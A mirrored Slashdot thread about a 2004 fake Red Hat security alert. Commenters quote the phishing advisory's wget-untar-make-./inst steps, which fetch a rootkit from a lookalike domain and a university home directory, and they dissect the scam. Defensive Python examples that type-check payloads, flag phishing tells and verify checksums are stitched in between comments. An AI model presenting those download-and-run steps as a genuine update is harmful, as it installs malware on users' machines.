Slashdot Mirror


Beware 'Fedora-Redhat' Fake Security Alert

rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.

628 comments

  1. text of site by Anonymous Coward · · Score: 5, Informative

    Original issue date: October 20, 2004
    Last revised: October 20, 2004
    Source: RedHat

    A complete revision history is at the end of this file.

    Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

    The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

    * First download the patch from the Stanford RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz or directly here.
    * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
    * cd fileutils-1.0.6.patch
    * make
    * ./inst

    Anybody running RedHat and Fedora are strongly adviced to apply this patch! Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com

    Thank you for your prompt attention to this serious matter,

    RedHat Security Team.

    Copyright © 2004 Red Hat, Inc. All rights reserved.

    1. Re:text of site by Botty · · Score: 0

      rofl....remote exploit in ls? Sure.....cause ls binds to port 1337 on execution...oh ya and I setuid ls. The thing about microsoft products is that because they keep everything so hush hush they COULD have remote exploits in the tiniest of products and programs. You never can be sure of what they're doing, but since Linux allows and encourages a complete understanding of how things work, this scare tactic is just laughable. The BSD and Solaris platform notice just means the hacker couldn't make his code portable ;)

    2. Re:text of site by Anonymous Coward · · Score: 0

      So, #1 it doesn't use RPM? Let's see, what else could we see wrong with this?

    3. Re:text of site by Seehund · · Score: 5, Informative
      Actually, the exploit indeed seems to use RPM. The archive includes a .bin file, which in reality is an RPM.
      drwxr-xr-x root/wheel 0 2004-10-23 21:09:09 fileutils-1.0.6.patch/
      -rw-r--r-- root/wheel 32 2004-10-23 02:59:42 fileutils-1.0.6.patch/Makefile
      -rw-r--r-- root/wheel 14297 2004-10-23 18:02:12 fileutils-1.0.6.patch/inst.c
      -rw-r--r-- root/wheel 990084 2004-10-23 21:06:48 fileutils-1.0.6.patch/fileutils-patch.bin
      But I see what you mean.

      Also, a simple thing such as that this time you're not recommended to simply start up2date or yum to get updates as usual really should set off some alarms in people's minds. And that fedora-redhat.com is not and has never been used by Fedora or Red Hat. And so on.

      I doubt that many fell for this.

      --
      Help saving AmigaOS and a free PowerPC market
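Seehund's point above is that the file extension (".bin") says nothing about what the file is; the archive member is really an RPM. The following is an added example (it is not code from the thread or from Red Hat) showing the defender-side check: classify a blob by its leading bytes and, for an RPM, read the fixed 96-byte lead to report the package name and type. The RPM lead layout and magic values are the documented format; the archive members and the RPM lead bytes are constructed stand-ins for the real tarball, whose contents are not on this page.

```python
import struct

# Magic numbers of the container formats that matter for this kind of triage.
RPM_LEAD_MAGIC = b"\xed\xab\xee\xdb"
GZIP_MAGIC = b"\x1f\x8b"
ELF_MAGIC = b"\x7fELF"

# RPM lead: magic[4] major[1] minor[1] type[2] archnum[2] name[66]
#           osnum[2] signature_type[2] reserved[16]  -> 96 bytes, big-endian.
RPM_LEAD_STRUCT = struct.Struct(">4sBBhh66shh16s")
assert RPM_LEAD_STRUCT.size == 96

# Which real format we would accept for a given extension; anything else that
# turns out to be a package or binary is reported as disguised.
EXPECTED_KIND = {"rpm": "rpm", "gz": "gzip", "tgz": "gzip", "sh": "script"}


def identify_payload(data: bytes) -> str:
    """Classify a blob by its leading bytes, ignoring the extension it was given."""
    if data.startswith(RPM_LEAD_MAGIC):
        return "rpm"
    if data.startswith(GZIP_MAGIC):
        return "gzip"
    if data.startswith(ELF_MAGIC):
        return "elf"
    if data.startswith(b"#!"):
        return "script"
    return "unknown"


def inspect_rpm_lead(data: bytes) -> dict:
    """Parse the RPM lead so the embedded package name and type can be reported.

    Raises ValueError when the data does not start with an RPM lead.
    """
    if len(data) < RPM_LEAD_STRUCT.size or not data.startswith(RPM_LEAD_MAGIC):
        raise ValueError("not an RPM lead")
    (_magic, major, minor, pkg_type, _arch,
     name, _os, sig_type, _reserved) = RPM_LEAD_STRUCT.unpack_from(data)
    return {
        "version": f"{major}.{minor}",
        "type": "binary" if pkg_type == 0 else "source",
        "name": name.split(b"\x00", 1)[0].decode("ascii", "replace"),
        "signature_type": sig_type,
    }


def build_sample_rpm_lead(name: str) -> bytes:
    """Constructed sample: a minimal RPM lead carrying the given name (demo only)."""
    return RPM_LEAD_STRUCT.pack(RPM_LEAD_MAGIC, 3, 0, 0, 1,
                                name.encode().ljust(66, b"\x00"), 1, 5, b"\x00" * 16)


def triage_archive_members(members: dict) -> dict:
    """For {filename: bytes}, report each member's real format and whether the
    extension hides a package or executable."""
    report = {}
    for filename, blob in members.items():
        kind = identify_payload(blob)
        ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
        disguised = kind in ("rpm", "elf", "gzip") and EXPECTED_KIND.get(ext) != kind
        report[filename] = {"kind": kind, "disguised": disguised}
    return report


# Constructed stand-ins for the archive members listed in the post above.
SAMPLE_MEMBERS = {
    "fileutils-1.0.6.patch/Makefile": b"all:\n\tcc -o inst inst.c\n",
    "fileutils-1.0.6.patch/inst.c": b"#include <stdio.h>\nint main(void) { return 0; }\n",
    "fileutils-1.0.6.patch/fileutils-patch.bin":
        build_sample_rpm_lead("fileutils-1.0.6") + b"\x00" * 64,
}


if __name__ == "__main__":
    for name, info in triage_archive_members(SAMPLE_MEMBERS).items():
        print(f"{name}: {info['kind']}{' (DISGUISED)' if info['disguised'] else ''}")
    print(inspect_rpm_lead(SAMPLE_MEMBERS["fileutils-1.0.6.patch/fileutils-patch.bin"]))
```

Running this on a real tarball would mean reading each member with `tarfile` and feeding the first 96 bytes to `identify_payload`; the point is that the check is done before anything is built or executed.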
    4. Re:text of site by Anonymous Coward · · Score: 0

      66.218.79.155, 66.218.79.147, 66.218.79.148, ...
      Connecting to www.fedora-redhat.com[66.218.79.155]:80... connected.

      # as of this post it is still up...

    5. Re:text of site by Anonymous Coward · · Score: 0

      You have to compromise another system (triple score bonus if you compromise one of Pentagon's honeypots) through a compromised OpenBSD box, then they wouldn't have an excuse!

    6. Re:text of site by justforaday · · Score: 4, Funny

      Thanks for posting that! Whew, I sure am glad I managed to get that patch installed before anyone was able to take over my system...

      --
      I'll turn into a supernova and burn up everything. Well I'll turn into a black little hole and you'll turn into string.
    7. Re:text of site by MBCook · · Score: 4, Interesting
      Anyone who reads this and isn't instantly suspicious needs to up their paranoia level. Look at all the mistakes in the grammar! "Redhat found...". If this was from RedHat it would be "Redhat has found" or "We found" or "It has come to our attention" or something like that. "Some of the effected distriubtions include..." should be something more like "RedHat 7.2 and newer are effected" or some such. It would not end in "and not only" (which is terrible English, probably supposed to be "and more"). Plus why would a RedHat security advisory inform people if Solaris or *BSD was effected? I would expect that a link would be given to more information about the vulnerability (not just "see redhat.com" which is basically what's there). Last but not least, what has been RedHat all throughout the advisory becomes "Red Hat" in the last line.

      Beyond those obvious problems, the "best" targets of something like this (businesses) would have people who know better than this. Those people would know how a patch file would work. At minimum the "./inst" section should say "make install", which is much more common. So this would only effect the "newbie" Linux user. Last of all, I would expect that anything RedHat issued would say something like "or get the update through Red Carpet (or whatever their 'Windows Update' is called)".

      This isn't a very well made forgery. They could have easily taken a true RedHat advisory and modified it so the language would be better and sound more plausible. They could have at LEAST gotten someone who knows English better.

      Does anyone else find it strange someone would go through all the trouble of registering a domain-name to run this scam? Why not say "download it off the (such and such) mirror at ftp://120.584.391.568/pub/mirror/redhat/patches/patch_file.tar.gz" or something like that. Use any domain name and make it look like a mirror. When was the last time any company put a file for users at "(domainname).com/file.tar.gz"? Never.

      Most people could have done better, IMHO.

      --
      Comment forecast: Bits of genius surrounded by a sea of mediocrity.
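MBCook's post lists the tells a reader can spot by eye. The structural ones (a vendor-looking host that is not under the vendor's domain, an unsolicited "download this archive, build it and run it" procedure, no mention of the distribution's own update channel, urgency language) can be turned into a scanner that a mail gateway or a cautious user could run over an incoming advisory. The following is an added example, not code from the thread or from Red Hat; the trusted-domain allow-list and the update-tool keywords are assumptions chosen for this example, and the two sample messages are constructed (the first condenses the fake advisory quoted above, the second is a made-up notice that points at the real vendor channel). Grammar quality, which several posters rely on, is deliberately not scored here.

```python
import re

# Assumed allow-list: hosts under these domains count as the vendor's own.
TRUSTED_DOMAINS = {"redhat.com"}
# Tokens that make a host *look* like the vendor when it is not under a trusted domain.
VENDOR_TOKENS = ("redhat", "fedora")
# Assumed: a genuine notice of that era would point at one of these channels.
UPDATE_TOOLS = ("up2date", "yum", "rpm")

URL_RE = re.compile(
    r"(?:(?:https?|ftp)://)?((?:[\w-]+\.)+(?:com|org|net|edu|gov|info))\b(/\S*)?", re.I)
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl|ftp)\b", re.I)
# A bulleted or bare line that is just "make" or "./something": build-and-run instruction.
RUN_RE = re.compile(r"^\s*\W*\s*(?:\./\w+|make(?:\s+install)?)\s*$", re.M)
URGENCY_RE = re.compile(r"\b(?:immediately|critical|as soon as possible|urgent)\b", re.I)
ARCHIVE_RE = re.compile(r"\.(?:tar\.gz|tgz|bin|sh|rpm)$", re.I)


def hostname_trusted(host: str) -> bool:
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in TRUSTED_DOMAINS)


def scan_advisory(text: str) -> list:
    """Return a list of indicator tags found in an advisory-style message."""
    findings = []
    for host, path in URL_RE.findall(text):
        host = host.lower()
        if hostname_trusted(host):
            continue
        if any(tok in host for tok in VENDOR_TOKENS):
            findings.append(f"lookalike-domain:{host}")
        if path and ARCHIVE_RE.search(path):
            findings.append(f"untrusted-download:{host}{path}")
    if DOWNLOAD_RE.search(text) and RUN_RE.search(text):
        findings.append("download-then-execute")
    if not any(tool in text.lower() for tool in UPDATE_TOOLS):
        findings.append("no-vendor-update-channel")
    if URGENCY_RE.search(text):
        findings.append("urgency-pressure")
    return findings


# Constructed: a condensed copy of the fake advisory discussed in this thread.
FAKE_ADVISORY = """\
Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote
attacker to execute arbitrary code with root privileges.
The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch.
* First download the patch from the Stanford RedHat mirror:
  wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
* Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
* ./inst
Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com
"""

# Constructed: a made-up notice that points only at the vendor's own channel.
LEGIT_NOTICE = """\
Updated fileutils packages are available for Red Hat Linux.
Run up2date to retrieve the updated packages, or see https://rhn.redhat.com/errata/ for details.
"""

if __name__ == "__main__":
    for label, msg in (("fake", FAKE_ADVISORY), ("legit", LEGIT_NOTICE)):
        print(label, scan_advisory(msg))
```

The scanner is meant as a triage aid, not an oracle: a forger who fixes every one of these tells still produces a message that must be checked against the vendor's signed channel, which is why the last indicator (no reference to that channel) carries the most weight.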
    8. Re:text of site by Anonymous Coward · · Score: 0

      Look at all the mistakes in the grammar!

      Not only that, but what about the description of the 'vulnerability' itself - they want me to believe that ls and mkdir, which aren't setuid or setgid, are open to root exploits?

      Pull the other one.

      Jebus, if you're gonna announce an imaginary root exploit, at least make it a hole in something that could actually give root privs.

    9. Re:text of site by Anonymous Coward · · Score: 0

      Yeah because exploiting FreeBSD servers would actually make a big difference, because as we know *sarcasm* *BSD makes up the core demographic of the Internet. *sarcasm*

    10. Re:text of site by SnowZero · · Score: 1, Flamebait

      By the way, you want to use "affected", not "effected", which is a mistake the site also makes.

    11. Re:text of site by Anonymous Coward · · Score: 0

      "effected" -> "affected"

    12. Re:text of site by WindBourne · · Score: 5, Informative
      It is a little root kit.
      /bin/chgrp
      /bin/chmod
      /bin/chown
      /bin/cp
      /bin/dd
      /bin/df
      /bin/link
      /bin/ln
      /bin/ls
      /bin/mkdir
      /bin/mknod
      /bin/mv
      /bin/rm
      /bin/rmdir
      /bin/sync
      /bin/touch
      /bin/unlink
      /etc/DIR_COLORS
      /etc/DIR_COLORS.xterm
      /etc/profile.d
      /etc/profile.d/colorls.csh
      /etc/profile.d/colorls.sh
      /usr/bin/dir
      /usr/bin/dircolors
      /usr/bin/du
      /usr/bin/install
      /usr/bin/mkfifo
      /usr/bin/shred
      /usr/bin/vdir
      ...
      And there is more, but hey....
      --
      I prefer the "u" in honour as it seems to be missing these days.
    13. Re:text of site by innocent_white_lamb · · Score: 2, Informative
      Does anyone else find it strange someone would go through all the trouble of registering a domain-name to run this scam? Why not say "download it off the (such and such) mirror at ftp://120.584.391.568/pub/mirror/redhat/patches/patch_file.tar.gz" or something like that.

      Actually, they did. I think what's posted here is "version 2". This version came around earlier this weekend:

      Original issue date: October 20, 2004
      Last revised: October 20, 2004
      Source: RedHat

      A complete revision history is at the end of this file.

      Dear RedHat user,

      Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

      The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

      • First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
      • Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
      • cd fileutils-1.0.6.patch
      • make
      • ./inst

      Again, please apply this patch as soon as possible or you risk your system and others' to be compromised.

      Thank you for your prompt attention to this serious matter,

      RedHat Security Team.

      Copyright © 2004 Red Hat, Inc. All rights reserved.

      --
      If you're a zombie and you know it, bite your friend!
    14. Re:text of site by arodland · · Score: 1

      Or maybe "affected", unless the vulnerability produces, causes to be, or brings to pass one or more Linux distributions. :)

    15. Re:text of site by Anonymous Coward · · Score: 0

      I'll give a billion-trillion dollars to anyone who can find a remote code execution security flaw in a non setuid root system utility like ls or mkdir. Honestly, who the hell would fall for this?

    16. Re:text of site by Anonymous Coward · · Score: 0

      Site Temporarily Disabled

      This site has been temporarily disabled. If you are the owner of the site, please contact customer care.

    17. Re:text of site by ky11x · · Score: 1

      Some of the effected distriubtions include..." should be something more like "RedHat 7.2 and newer are effected" or some such.

      No. You mean "affected". You are not ready to write your own trojans either :)

    18. Re:text of site by Brandybuck · · Score: 1

      And that fedora-redhat.com is not and has never been used by Fedora or Red Hat. And so on.

      Really now? This should set off alarms in people's minds? Do you really expect people to *know* that "fedora-redhat.com" doesn't belong to RedHat? This is social engineering at its finest.

      --
      Don't blame me, I didn't vote for either of them!
    19. Re:text of site by Anonymous Coward · · Score: 0

      Most people could have done better, IMHO.
      What could you expect for Microsoft ?!

    20. Re:text of site by Nyder · · Score: 1

      wow, our first clue. The Anonymous Coward must be the one responsible.

      after all, look at all the posts AC has done over the years.

      Definitely out to get linux users.

      --
      Be seeing you...
    21. Re:text of site by Anonymous Coward · · Score: 1, Insightful

      >Brandybuck (704397) wrote: ...
      >doesn't belong to RedHat? This is social engineering at its finest.

      At its finest? Who the hell are you kidding. This is a sample of social engineering, yes... but... my god it's far from being the cream of the crop. Way way way too many simple mistakes.

      Shows lack of attention to detail. Bad grammar, Taiwan mail relay, no up2date source...... screams amateur...

      Now if the grammar had been correct, if the target had been correct (RH 9, FC 2), if the delivery method had been correct (up2date source), if the mail header had been properly faked... then it would rank as a decent attempt. But really... with the ease at which email headers can be faked.... this doesn't even register on the talent meter of social engineering.

    22. Re:text of site by Brandybuck · · Score: 1, Insightful

      this doesn't even register on the talent meter of social engineering.

      Oh but it does! Stop being an ass and look around you. Not everyone is an expert RedHat administrator. Not everyone is paranoid enough to check the headers of every email they receive. Some people are <gasp> newbies! To them the "redhat-fedora" domain looks damned official.

      --
      Don't blame me, I didn't vote for either of them!
    23. Re:text of site by Seehund · · Score: 2, Insightful

      Really now? This should set off alarms in people's minds?

      Yes. At least in combination with the other glaring flaws I and others have already mentioned.

      People who subscribe to security update announcements (and thus would be the primary target for a fake security announcement) have actively chosen to do so, and know what they look like, where they're sent from, what domains that are usually referenced to and what that/those website(s) look like. People who have not subscribed to such announcements would likely be more suspicious to unsolicited messages of this kind.

      There are always exceptions. Some people will be taken in by this, no doubt, despite them being sufficiently savvy to have chosen to install a community-supported Linux distribution in the first place.

      It's social engineering all right. Just not at its finest.

      --
      Help saving AmigaOS and a free PowerPC market
    24. Re:text of site by David+Horn · · Score: 1

      You can always tell when something is fake because the spelling and grammar is all wrong. eg, "adviced", the use of exclamation marks, "and not only."

      Doesn't take a genius to spot it, but does suggest that it was created by someone who's not a native English speaker. Seems that most bad things on the net (spam and so forth) seem to be heading out from foreign countries.

      --
      PocketGamer.org - For the gamer on the go!
    25. Re:text of site by Anonymous Coward · · Score: 1

      Don't be a tit. Anyone who is already subscribed to Fedora-Announce or Fedora-Legacy would spot this idiotic attempt at an email a mile off and laugh their ass off. Anyone who isn't subscribed should be immediately suspicious; it is an unsolicited email telling them to download and run an executable, and contains some dodgy grammar. Anyone stupid enough to fall for this deserves what they get.

    26. Re:text of site by spiff42 · · Score: 1
      Well. As far as I know, in a very large percentage of 0wned Linux boxes, the command ls was used as a part of the attack ;-)

      /Spiff

    27. Re:text of site by Analog+Anomaly · · Score: 0

      Maybe I'm giving *nix users too much credit, but the bulk of *nix users have to have at least some semblance of a clue to use it. It's been my experience that, like myself, most *nix users aren't complete idiots and wouldn't fall for something so obviously fake. Common sense is a security tool you know.

    28. Re:text of site by HermanAB · · Score: 1

      Well, actually, it is perfect American Public School English - very convincing...

      --
      Oh well, what the hell...
    29. Re:text of site by Kehvarl · · Score: 1

      Perhaps it's simply an incredibly advanced vulnerability which does in fact produce a new linux distribution from nothing but ls and mkdir with the proper path applied.

    30. Re:text of site by Anonymous Coward · · Score: 0

      Hehehehehehehehehe! Hahahahahahahaahaha!

      They can't even make an rpm release of their exploit code?

      The next round won't be this stupid.

      bcl

    31. Re:text of site by Kent+Recal · · Score: 1

      Man, I would hate to get my DIR_COLORS messed up!

    32. Re:text of site by zaphraud · · Score: 1

      Here's a thought

      Maybe it's intended for disgruntled workers at said businesses, and therefore, should obviously be a trojan to anyone with a clue, but yet look legitimate enough that a jury would buy it.

    33. Re:text of site by mgcarley · · Score: 1

      How many dumb users out there are running Linux? I would imagine very few. Those that get the email probably know better, anyway. If a patch like that came out, and it really was serious, I would expect RHN to be pushing it at me, not an email from a random website that as a Fedora user I probably wouldn't have otherwise known existed.

      For the record, I use SuSE Pro 9.2 anyway - I wouldn't download a patch (especially one that required me to do a make-install like that) from anywhere unless I knew it was an official mirror anyway... Most of the time, YaST keeps me nice and up to date :)

      --
      Founder & COO, Hayai India (hayai.in) / USA (hayaibroadband.com) // t: @mgcarley
  2. We knew this day would come by Orgazmus · · Score: 4, Insightful

    Adopting dumb users had to bring the ones exploiting the stupidity with them. Even tho running as a non-admin should help against these things, there is no cure against security holes between the chair and the keyboard.

    --
    The system had the verbosity of HTML combined with all the readability of compiled assembly viewed as bitmap images
    1. Re:We knew this day would come by Solean · · Score: 0, Flamebait

      Linux users are proven to be smarter than the Windows breed of the human race. :)

      --
      -=Insert Witty Comment.=-
    2. Re:We knew this day would come by Stevyn · · Score: 5, Funny

      I wouldn't worry, they're probably on the forums trying to find the command to install it.

    3. Re:We knew this day would come by antoy · · Score: 5, Interesting

      Yes, but when this kind of thing happened on Windows, it was Windows' fault for not having the proper security mechanisms to stop it. The difference is that Windows will set up all users as administrators, true, but running as a plain user can be very bad too. The fact is, neither of the OSes provides (by default, at least) substantial protection from such attacks.

      Allowing only registered executables to run could be set up to prevent such things. Microsoft signs their patches and programs too, but no regular user will ever check.

      Incorporate such functions in the OS or GUI. Harass the user whenever an executable or shared library is introduced to the system: "Here are the certifications, do you trust this?"

      Limiting permissions up to the user level is not enough anymore: VM based environments such as Java and .NET have program/assembly-based security systems. But although the technology exists, it is very poorly handled, at least in the .NET front where I am experienced: There is no simple wizard to set up settings the way you want them, there is no popup dialog asking you how much you trust this executable and which permissions it should get. Such technology could go a long way in preventing such ridiculously simple attacks from succeeding in the future.

      First time I saw a similar feature was in Kerio Personal Firewall, which would ask every time a new program would attempt to connect somewhere, or have something connect to a port it opened. It was simple and effective, and the 'harassment' was more than worth it (SP2 does something similar, but it's flawed*).

      In conclusion, I want to say that I believe if all people had:

      1) Startup Monitor - Painfully simple, no one should be without it.
      2) Kerio Personal Firewall, or equivalent
      3) An executable monitor as described above,
      the *real* reasons for Windows' pathetic security record would be no more. Never mind those vulnerabilities: I could give you a .exe that would delete all your documents, and you have but to click on it (I swear it decrypts HL2 from the Steam files :-) The same, of course, applies to Linux.


      * SP2 tells you when an executable tries to connect, and waits for you to decide if you want to block it, but it *does* allow the connection to work until you decide what to do with it. Furthermore, I'm not sure if it can tell if an executable was replaced with a compromised version (Kerio has MD5 hashes)

    4. Re:We knew this day would come by Orgazmus · · Score: 1

      Then again, how do you get a user that doesn't understand that security patches don't spread via mail to install those programs?
      And allowing only registered executables to run is a bad thing. Who should decide? Microsoft?

      --
      The system had the verbosity of HTML combined with all the readability of compiled assembly viewed as bitmap images
    5. Re:We knew this day would come by antoy · · Score: 2

      Then again, how do you get a user that doesn't understand that security patches don't spread via mail to install those programs?
      You can't. That's exactly why they should be part of the OS environment.

      And allowing only registered executables to run is a bad thing. Who should decide? Microsoft?

      No, the user. I'm not talking about a central authority a la driver-signing. I'm talking about letting that to the user. Does he want to give full network permissions to a shareware game he downloaded? No (with a bold "Recommended" next to it). I hope I made myself clear now.

    6. Re:We knew this day would come by fucksl4shd0t · · Score: 4, Interesting

      And allowing only registered executables to run is a bad thing. Who should decide?

      On my computer, I should decide, and the registration dealie should provide me with the information I need to make the decision.

      The two parts of Microsoft's weird DRM thing I disagree with (with regards to running executables) are that the key is inaccessible to me, stashed somewhere in the BIOS, and that Microsoft is the one who decides what is safe and what isn't.

      --
      Like what I said? You might like my music
    7. Re:We knew this day would come by Orgazmus · · Score: 1

      "the registration dealie should provide me with the information I need to make the decision."
      And then it is possible to fake it, isn't it? :)

      --
      The system had the verbosity of HTML combined with all the readability of compiled assembly viewed as bitmap images
    8. Re:We knew this day would come by Anonymous Coward · · Score: 0

      Memo: Improve step-by-step help for next version. Got it, thanks!

    9. Re:We knew this day would come by dagur · · Score: 1

      This is a giant step for the linux desktop system! It's proof that linux has become such a mature desktop system that attackers assume it has a bunch of regular John Does!

    10. Re:We knew this day would come by DissidentHere · · Score: 3, Insightful

      Why would anyone even bother trying this kind of cheap social engineering with Linux users at this point. What /. reader would actually fall for this shit? We all make fun of security through obscurity, but *nix users also tend to have security through intelligence.

      Here is where the real danger lies, getting Linux on the desktop and having your grandma fall for this type of tripe, it will give *nix a bad name. "Oh no, Linux is just as vulnerable as Windows" No - it's the users that are vulnerable, and the users that need to be educated. We all do what we can to lock down our boxen, but in the end it too often comes down to what's between the chair and the keyboard.

      --
      "None of us are as dumb as all of us." - meeting mantra
    11. Re:We knew this day would come by fucksl4shd0t · · Score: 1

      Heh, I didn't say it would be foolproof, just useful.

      --
      Like what I said? You might like my music
    12. Re:We knew this day would come by Hatta · · Score: 1

      The fact is, neither of the OSes provides (by default, at least) substantial protection from such attacks.

      As long as you have people admining their own boxes at home, you can never protect against these attacks. Any measures you take will restrict my absolute and total control over my own computer, which is what makes linux so attractive in the first place.

      --
      Give me Classic Slashdot or give me death!
    13. Re:We knew this day would come by antoy · · Score: 1

      As long as you have people admining their own boxes at home, you can never protect against these attacks. Any measures you take will restrict my absolute and total control over my own computer, which is what makes linux so attractive in the first place.

      I do not see how the measures I propose limit control, considering that all choices are made by the administrator and not by any outside central authority. Care to clarify, or give an example?

    14. Re:We knew this day would come by suckmysav · · Score: 2, Insightful

      > In conclusion. I want to say that I believe
      > if all people had:
      >
      > 1) Startup Monitor - Painfully simple, no one
      > should be without it.

      I use startup monitor. It is good. The problem is that the vast majority of Windows users are so habitualised into clicking 'YES' all the time that nasties will often get installed anyway.

      Malware: Do you want to install this nasty browser hijacker?

      n00b: Yes, just give me my goddamn "tropical aquarium" screensaver already!

      > 2) Kerio Personal Firewall, or equivalent

      Agreed, although even better is to have a NAT/firewall device for your internet connection. I'm not a fan of having a local "personal" firewall on a n00b's PC, as n00bs have a habit of screwing things up, and this includes screwing up their firewall software. If your firewall functionality is sitting in a little NAT box in the corner then they are not gonna accidentally screw it up. Also, personal firewalls such as ZoneAlarm can also suffer from the "yes click reflex" problem.

      Malware: Tries to 'phone home'

      ZoneAlarm: Do you want to let application porn2u.exe have access to the internet?

      n00b: Yes goddammit, and stop bugging me already!

      > 3) An executable monitor as described above.

      I'm not sure I understand what you are suggesting here. I assume you are referring to a process listing app, such as the Windows task manager? Most clueless n00bs are not capable of comprehending what task manager is showing them. There are too many "good" processes that are virtually unidentifiable listed.

      --
      "You can't fight in here, this is the war room!"
    15. Re:We knew this day would come by Hatta · · Score: 1

      Allowing only registered executables to run could be set up to prevent such things.

      There's a good for instance. Registered executables only work if there's a central registry that's trusted. If each admin keeps his own registry, he's liable to be fooled by people like this.

      --
      Give me Classic Slashdot or give me death!
    16. Re:We knew this day would come by Hatta · · Score: 1

      Memo: Improve step-by-step help for next version. Got it, thanks!

      Nah, then they'd know for sure it was a fake.

      --
      Give me Classic Slashdot or give me death!
    17. Re:We knew this day would come by Erik+Hollensbe · · Score: 1

      Actually this is already being done in the unix world, just no one takes advantage of it, or at least, pays attention.

      FreeBSD's ports system checks MD5 sums automatically.

      RPM can use GPG signing keys. I believe deb can too.

      RedHat signs all their RPMs with their security key, Mandrake, SuSE and other RPM pals do it as well. The MD5 sum accompanying FreeBSD's system is distributed by the FreeBSD ports team and generated from the file that is being fetched. It will either try and re-download the file or refuse to work if it does match, which I'm pretty sure is the case for the GPG counterparts.

      It's not limiting the system but it is keeping tabs on what you install.

      Of course, if you get "joe's p2p tool 2000 pro platinum gold l33t edition" that one of those groups doesn't distribute, well, you can't blame anyone but yourself for not checking the code itself.
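The post above describes the mechanism that a fake "patch" cannot satisfy: a checksum (FreeBSD ports' distinfo) or signature (RPM/deb GPG keys) that is distributed through the vendor's own channel and checked before anything is built. The following is an added example, not code from the thread or from the FreeBSD or Red Hat projects, that parses distinfo-style lines (`ALGO (file) = value`), verifies a fetched blob against every listed digest and its size, and refuses to proceed on any mismatch. Two choices in it are mine rather than the page's: it also refuses when only MD5 is listed (MD5 is no longer collision-resistant, so by itself it does not prove the file is what the ports team published), and the three-byte "archive" with its digests is a constructed sample so the check runs offline.

```python
import hashlib
import re

# One distinfo line per checksum, in the format the FreeBSD ports tree uses.
DISTINFO_RE = re.compile(
    r"^(?P<algo>MD5|SHA1|SHA256|SIZE)\s+\((?P<file>[^)]+)\)\s*=\s*(?P<value>\S+)\s*$")

# Constructed sample: a three-byte "archive" whose contents are b"abc", with the
# real MD5/SHA256 of those bytes. Not the digests of any real fileutils release.
SAMPLE_DISTINFO = """\
MD5 (fileutils-1.0.6.tar.gz) = 900150983cd24fb0d6963f7d28e17f72
SHA256 (fileutils-1.0.6.tar.gz) = ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad
SIZE (fileutils-1.0.6.tar.gz) = 3
"""
SAMPLE_ARCHIVE = b"abc"


def parse_distinfo(text: str) -> dict:
    """Return {filename: {ALGO: value}} from distinfo text; unknown lines are skipped."""
    expected = {}
    for line in text.splitlines():
        m = DISTINFO_RE.match(line.strip())
        if m:
            expected.setdefault(m["file"], {})[m["algo"]] = m["value"].lower()
    return expected


def verify_fetched(filename: str, data: bytes, expected: dict,
                   minimum_algo: str = "SHA256"):
    """Return (ok, reasons). ok is True only if the file is listed, every listed
    digest and size matches, and a digest at least as strong as minimum_algo is listed."""
    entry = expected.get(filename)
    if entry is None:
        return False, [f"{filename} is not listed in distinfo"]
    reasons = []
    if minimum_algo not in entry:
        reasons.append(f"no {minimum_algo} digest listed; MD5 alone is not tamper-evident")
    for algo, value in entry.items():
        if algo == "SIZE":
            actual = str(len(data))
        else:
            actual = hashlib.new(algo.lower(), data).hexdigest()
        if actual != value:
            reasons.append(f"{algo} mismatch: expected {value}, got {actual}")
    return (not reasons), reasons


if __name__ == "__main__":
    table = parse_distinfo(SAMPLE_DISTINFO)
    print(verify_fetched("fileutils-1.0.6.tar.gz", SAMPLE_ARCHIVE, table))
    print(verify_fetched("fileutils-1.0.6.tar.gz", b"abd", table))  # tampered content
```

The important property is where `SAMPLE_DISTINFO` comes from: the digests have to arrive through a channel the attacker does not control (the ports tree, a signed metadata file), because a checksum served from the same place as the tarball proves nothing, and the fake advisory above offered no checksum of any kind.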

    18. Re:We knew this day would come by Erik+Hollensbe · · Score: 0, Redundant

      Not to mention, I can't think of a rootkit that doesn't hack ps.

      Standard fare for me is to keep a statically compiled ps and lsof available to me off-machine in case anything 'weird' happens. It doesn't solve all problems, but it helps.

    19. Re:We knew this day would come by Erik+Hollensbe · · Score: 2, Interesting

      You have got to be kidding me.

      While I'm not intending to insult anyone's intelligence here, /. is a large group and some pay more attention to security and these kinds of attacks than others. Not to mention, too many people visit here to have "probability = 0" be a realistic assessment.

